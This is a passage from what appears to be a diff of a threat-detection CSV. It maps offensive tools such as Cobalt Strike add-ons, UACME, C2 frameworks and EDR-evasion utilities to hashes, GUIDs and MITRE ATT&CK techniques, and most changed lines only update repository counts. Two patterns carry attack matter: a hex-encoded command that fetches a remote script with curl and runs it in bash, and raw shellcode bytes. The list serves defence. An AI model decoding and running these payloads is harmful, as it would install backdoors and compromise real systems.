(ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense 
Evasion","https://github.com/reveng007/DarkWidow","1","1","N/A","10","3","268","38","2023-08-03T22:37:44Z","2023-07-24T13:59:16Z" "*4d262988fe9d252191947ab780535d496ed24fa27668cf76c6cb9b6474a391c4*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*4d5350c8-7f8c-47cf-8cde-c752018af17e*","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","1","N/A","10","10","447","59","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" -"*4d870a821d4104536f0ae7d1920748e9a6ea2dc828103470516a9a2f0b9601ff*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in 
Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*4d870a821d4104536f0ae7d1920748e9a6ea2dc828103470516a9a2f0b9601ff*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*4ddc82b4af931ab55f44d977bde81bfbc4151b5dcdccc03142831a301b5ec3c8*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*4DE43724-3851-4376-BB6C-EA15CF500C44*","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","0","N/A","9","2","152","34","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z" "*4E0CA74F5E074DFF389263D15E3913750EB437C1C3CD3B212C2998352023B980*","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","AD Enumeration","https://github.com/canix1/ADACLScanner","1","0","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" "*4F2AD0E0-8C4D-45CB-97DE-CE8D4177E7BF*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers 
framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" "*4g3nt47/Striker*","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","279","43","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" "*50050/SharpC2*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" -"*505152535657556A605A6863616C6354594883EC2865488B32488B7618488B761048AD488B30488B7E3003573C8B5C17288B741F204801FE8B541F240FB72C178D5202AD813C0757696E4575EF8B741F1C4801FE8B34AE4801F799FFD74883C4305D5F5E5B5A5958C3*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" -"*5067F916-9971-47D6-BBCB-85FB3982584F*","offensive_tool_keyword","PowerShdll","Run PowerShell with dlls only Does not require access to powershell.exe as it uses powershell automation dlls. 
PowerShdll can be run with: rundll32.exe. installutil.exe. regsvcs.exe. regasm.exe. regsvr32.exe or as a standalone executable.","T1059 - T1218 - T1216 - T1053 - T1118","TA0002 - TA0008 - TA0003","N/A","N/A","Defense Evasion","https://github.com/p3nt4/PowerShdll","1","0","N/A","N/A","10","1649","263","2021-03-17T02:02:23Z","2016-07-15T00:08:32Z" +"*505152535657556A605A6863616C6354594883EC2865488B32488B7618488B761048AD488B30488B7E3003573C8B5C17288B741F204801FE8B541F240FB72C178D5202AD813C0757696E4575EF8B741F1C4801FE8B34AE4801F799FFD74883C4305D5F5E5B5A5958C3*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*5067F916-9971-47D6-BBCB-85FB3982584F*","offensive_tool_keyword","PowerShdll","Run PowerShell with dlls only Does not require access to powershell.exe as it uses powershell automation dlls. PowerShdll can be run with: rundll32.exe. installutil.exe. regsvcs.exe. regasm.exe. 
regsvr32.exe or as a standalone executable.","T1059 - T1218 - T1216 - T1053 - T1118","TA0002 - TA0008 - TA0003","N/A","N/A","Defense Evasion","https://github.com/p3nt4/PowerShdll","1","0","N/A","N/A","10","1650","263","2021-03-17T02:02:23Z","2016-07-15T00:08:32Z" "*5086CE01-1032-4CA3-A302-6CFF2A8B64DC*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10","","N/A","","","" "*516280565958*","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/cs2modrewrite","1","1","N/A","10","10","553","114","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z" "*516280565959*","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - 
T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/cs2modrewrite","1","1","N/A","10","10","553","114","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z" -"*526f652d4d9e20a19374817eac75b914b75f3bfaecc16b65f979e5758ea62476*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. 
This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","1","61","18","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" -"*52a696ae714eb81033c477d1ec6c01389eef56c847609e89d360c2fb6899b4b6*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*53b83ef74e74ea230eeb916254753d886e8ec04e09cd8823af9f94660bdbc43b*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*526f652d4d9e20a19374817eac75b914b75f3bfaecc16b65f979e5758ea62476*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. 
This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","1","62","19","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" +"*52a696ae714eb81033c477d1ec6c01389eef56c847609e89d360c2fb6899b4b6*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*53b83ef74e74ea230eeb916254753d886e8ec04e09cd8823af9f94660bdbc43b*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*5439CECD-3BB3-4807-B33F-E4C299B71CA2*","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tools","https://github.com/nettitude/MalSCCM","1","0","N/A","10","3","223","34","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z" "*555662D4CCBB940D87869E6295EC7CC74BB85D8C8FC5916EC34D1226704578C5*","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","AD 
Enumeration","https://github.com/canix1/ADACLScanner","1","0","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" -"*555AD0AC-1FDB-4016-8257-170A74CB2F55*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*555AD0AC-1FDB-4016-8257-170A74CB2F55*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" "*55A48A19-1A5C-4E0D-A46A-5DB04C1D8B03*","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","0","N/A","10","1","91","11","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z" "*55F0368B-63DA-40E7-A8A5-289F70DF9C7F*","offensive_tool_keyword","BlockOpenHandle","Block any Process to open HANDLE to your process - only SYTEM is allowed to open handle to your process - with that you can avoid remote memory scanners","T1050.005 - T1480","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/BlockOpenHandle","1","0","N/A","9","2","149","21","2023-04-27T05:42:51Z","2023-04-27T05:40:47Z" -"*56843f0410f4c97e8d0809bf7fe4c3e7efaf0dcefd595da58da07794d1709f27*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*574a8de72c4661a520afbcdbe4580335203d0f1b9da5d9ba3659d30d02b89466*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" 
-"*57A893C7-7527-4B55-B4E9-D644BBDA89D1*","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","0","N/A","9","2","141","21","2023-09-02T08:09:50Z","2022-03-20T19:02:06Z" +"*56843f0410f4c97e8d0809bf7fe4c3e7efaf0dcefd595da58da07794d1709f27*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*574a8de72c4661a520afbcdbe4580335203d0f1b9da5d9ba3659d30d02b89466*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*57A893C7-7527-4B55-B4E9-D644BBDA89D1*","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","0","N/A","9","2","142","21","2023-09-02T08:09:50Z","2022-03-20T19:02:06Z" "*57D4D4F4-F083-47A3-AE33-AE2500ABA3B6*","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. 
It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","0","N/A","8","1","23","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z" -"*59744929cc3a6d02d9ec26cc2945b00eaa6079c32602f460558adb9e7146f824*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*5994c2c930bf095841520a4e6859511485f6ad0eec0d660392462402c781a6ba*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*5a27534e0361dc8dce940b8732c306443af9944e23aaac6865131e1eb7570687*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*59744929cc3a6d02d9ec26cc2945b00eaa6079c32602f460558adb9e7146f824*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" 
+"*5994c2c930bf095841520a4e6859511485f6ad0eec0d660392462402c781a6ba*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*5a27534e0361dc8dce940b8732c306443af9944e23aaac6865131e1eb7570687*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*5A403F3C-9136-4B67-A94E-02D3BCD3162D*","offensive_tool_keyword","Pspersist","Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.","T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001","TA0005 ","N/A","N/A","Persistence","https://github.com/TheD1rkMtr/Pspersist","1","0","N/A","10","1","72","17","2023-08-02T02:27:29Z","2023-02-01T17:21:38Z" "*5a40f11a99d0db4a0b06ab5b95c7da4b1c05b55a99c7c443021bff02c2cf93145c53ff5b*","offensive_tool_keyword","cobaltstrike","Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - 
T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/zha0gongz1/DesertFox","1","1","N/A","10","10","123","26","2023-02-02T07:02:12Z","2021-02-04T09:04:13Z" "*5A6F942E-888A-4CE1-A6FB-1AB8AE22AFFA*","offensive_tool_keyword","StackCrypt","Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads","T1027 - T1055.004 - T1486","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/StackCrypt","1","0","N/A","9","2","144","23","2023-08-02T02:25:12Z","2023-04-26T03:24:56Z" -"*5adad6349711b6f30ce8f37c24b7db4201c2002b7b2fec5093f81e1c3c50761f*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*5b20f14c3b8322a354bf374d9cb463359c57d07f4031d788c7bc88bda6f833ee*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*5adad6349711b6f30ce8f37c24b7db4201c2002b7b2fec5093f81e1c3c50761f*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - 
TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*5b20f14c3b8322a354bf374d9cb463359c57d07f4031d788c7bc88bda6f833ee*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*5b5b20242873746174202d632559202f62696e2f73682920213d20242873746174202d632559202e73736829205d5d202626207b203a3b746f756368202d72202f62696e2f7368202e7373683b6578706f7274204b45593d22223b62617368202d63202224286375726c202d6673534c207468632e6f72672f737368782922*","offensive_tool_keyword","Openssh","Infecting SSH Public Keys with backdoors","T1098.003 - T1562.004 - T1021.004","TA0006 - TA0002 - TA0011","N/A","N/A","C2","https://blog.thc.org/infecting-ssh-public-keys-with-backdoors","1","0","N/A","10","9","N/A","N/A","N/A","N/A" -"*5c96d6754fab5329173536f2a4b29997c1661927f28b9ddcb091e4652e0bb014*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*5d1fc31a7caf39f1c766e15fb64d44f1417d3b6f2fe389f3e104218050c3746a*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*5c96d6754fab5329173536f2a4b29997c1661927f28b9ddcb091e4652e0bb014*","offensive_tool_keyword","UACME","Defeating Windows User Account 
Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*5d1fc31a7caf39f1c766e15fb64d44f1417d3b6f2fe389f3e104218050c3746a*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*5dec1cfe7c0c2ec55c17fb44b43f7d14*","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","10","10","37","3","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" -"*5E0812A9-C727-44F3-A2E3-8286CDC3ED4F*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","48","6","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" +"*5E0812A9-C727-44F3-A2E3-8286CDC3ED4F*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" "*5E8106A6F89B053ED91C723D5D4CAE3FFC15F1CE*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - 
